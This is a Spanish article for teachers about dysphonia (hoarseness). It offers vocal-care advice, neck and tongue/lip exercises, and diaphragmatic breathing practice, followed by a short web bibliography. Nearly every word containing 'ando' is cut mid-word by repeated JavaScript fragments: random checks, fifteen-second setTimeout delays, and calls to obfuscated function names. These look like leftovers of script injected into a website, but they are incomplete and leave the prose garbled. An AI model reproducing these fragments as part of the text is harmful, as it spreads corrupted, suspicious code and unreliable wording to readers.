DISFONÍA Y DOCENCIA

Autora: Manuela Pecero Amaya


 

                 En este artículo se pretende dar a conocer un problema que en más de una ocasión nos ha resultado incómodo a más de un docente a la hora de impartir clases como es la pérdida parcial de voz o mejor conocida como “ronquera”. Además también analizaremos cuáles son los consejos más prácticos y los ejercicios a seguir para que nos ayuden a evitarla.

Ordenador, pizarra digital, libros digitales, tablets… a lo largo de nuestra vida docente se nos ha dotado de recursos para enseñar a nuestros niños de una manera lúdica y amena pero a la hora de la verdad, nuestra manera de comunicarnos con ellos usamos un recurso mucho más convencional: nuestra Voz. Es este recurso el que tendremos que utilizar hasta el último día como maestros y es el que mejor debemos cuidar.

Por eso en este artículo veremos qué es la disfonía y qué la diferencia de la afonía, cuál es la causa principal que la provocan en los docentes, también analizaremos algunos consejos de salud vocal para evitar posibles ronqueras, los tipos de relajación que podremos hacer para evitarla y, por último, aprenderemos a respirar, ya que una buena respiración nos permitirá emitir mejor los sonidos sin dañar nuestra voz.

Según la R.A.E. la disfonía es un trastorno cualitativo o cuantitativo de la fonación por causas orgánicas o funcionales; por el contrario,  la afonía es la falta de voz. Es decir, la disfonía es la pérdida del timbre normal de voz, lo que conocemos como “ronquera”, al contrario del mal uso que hacemos de la afonía que es la pérdida total de voz, esto significa que no nos quedamos “afónicos” cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando estamos roncos sino “disfónicos”.

Hay muchas causas que pueden llegar a concluir en una disfonía como los malos hábitos como el fumar, el cantar con una técnica que no es la adecuada pero la causa más habitual entre los docentes es el abuso vocal, es decir, gritamos en exceso o usamos habitualmente un tono de voz alto. Por eso los siguientes consejos nos permitirán evitar la disfonía:

- Empezar a hablar lentamente, de forma calmada y con poca intensidad.

- No carraspear, así evitamos dañar las cuerdas vocales.

- No gritar ni elevar el volumen innecesariamente.

- Utilizar humidificadores para contrarrestar la calefacción.

- Evitar aclarar continuamente la garganta y/o toser con fuerza.

- No competir con los ruidos ambientales a la hora de hablar, para ello es mejor callarse o ir a un sitio más tranquilo.

- Evitar bebidas muy frías o muy calientes.

- Evitar de igual modo el café, té, refrescos y bebidas alcohólicas, ya que disminuyen la lubricación de las cuerdas vocales.

- Beber agua, al menos 2 litros al día.

- Procurar estar siempre relajado. Es mejor contar hasta 10 antes de “explotar” dañandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando nuestra voz en situaciones angustiosas, estresantes…

- Intentar hablar con frases en lugar de párrafos para facilitarnos respirar un poco entre frase y frase.

Al igual que un futbolista necesita un calentamiento y estiramiento previo antes de un partido, nosotros deberíamos hacer lo mismo antes de nuestro partido particular.

Hay varios tipos de relajación: del cuello y de los órganos fonoarticularitorios. Cada uno de los ejercicios que se detallan a continuación deben repetirse al menos 5 veces.

a) Ejercicios de relajación del cuello.

- Sentados y con la espalda recta llevamos nuestra cabeza desde el centro al lado derecho, volvemos al centro y giramos a nuestro lado derecho.

- Estiramos el cuello hacia el lado derecho, volvemos al centro y hacemos lo mismo pero hacia el lado izquierdo.

- Inclinamos la cabeza hacia el lado derecho y la balanceamos hasta llegar hacia el lado izquierdo.

- Girar la cabeza lentamente hacia un lado a otro, parandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en el centro.

- Bajar la cabeza y mantenemos unos segundos, después igual pero hacia atrás.

b) Ejercicios de los órganos fonoarticularios:

Hay que diferenciar entre los ejercicios de las praxias linguales, las praxias labiales y los ejercicios con la mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andíbula y el velo del paladar. Aquí podemos ver algunos ejercicios de praxias linguales y labiales.

b.1.) Ejercicios de praxias linguales.

- Sacar la lengua y volverla a entrar en la boca.

- Sacar la lengua y llevarla hacia arriba y hacia abajo.

- Sacar la lengua y llevarla de derecha a izquierda.

- Sacar la lengua plana y ancha y volverla a meter en la boca estrecha.

- Relamerse el labio superior desde un extremo a otro y después el labio inferior.

- Llevar la lengua por delante de los dientes superiores y después por detrás.

-Repetir el ejercicio anterior pero con los dientes inferiores.

- Llevar el ápice de la lengua a las muelas superiores de la derecha y llegar hasta el lado izquierdo.

- Repetir el ejercicio anterior pero con los dientes inferiores.

b.2.) Ejercicios de praxias labiales.

- Besar y después sonreir.

- Poner morro en el lado izquierdo y después derecho.

- Mantener aire en la boca haciendo un flemón en el lado izquierdo y después en el lado derecho.

- Hichar la boca con aire, mantenerlo y después chupar los labios.

- Morder el labio superior y después el inferior.

- Hacer como si se mastica por el lado derecho y después por el izquierdo.

- Abrir labios enseñandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las muelas del lado izquierdo y después del derecho.

Por último, la respiración, al igual que los ejercicios anteriores es muy importante. Hay que saber que hay tres tipos de respiración: La Costal Superior (que es la más común pero que nos permite poca ventilación), la respiración Intermedia y la respiración Costo-diafragmática (La más adecuada).

En la respiración Costo-diafragmática el diafragma se contrae y desciende empujandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los órganos que están debajo de él para así poder tener una buena ventilación.

Un ejercicio para aprender a utilizar el diafragma a la hora de la respiración es tumbarse en la cama con un libro encima de nuestro diafragma e intentar que el libro no se eleve cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando tomamos aire y no baje a la hora de expulsarlo. Notaremos cómo las costillas se desplazan hacia los laterales obteniendo así mayor oxigenación para nuestros pulmones.

Por muchas nuevas tecnologías que nos ofrezcan a lo largo de nuestra carrera docente la voz es y será la más adecuada para trasmitir a nuestros alumnos nuestros conocimientos y experiencias y por ello hay que cuidarla como si se tratase del portátil nuevo que nos acaba de llegar y estamos deseandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando estrenar.

 

WEBGRAFÍA

- www.cun.es

- logopediayformacion.blogspot.com

- www.clinicajuancarrero.net

- www.logopedia-granada.com

- www.rae.es

- Experiencia personal con Logopeda.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.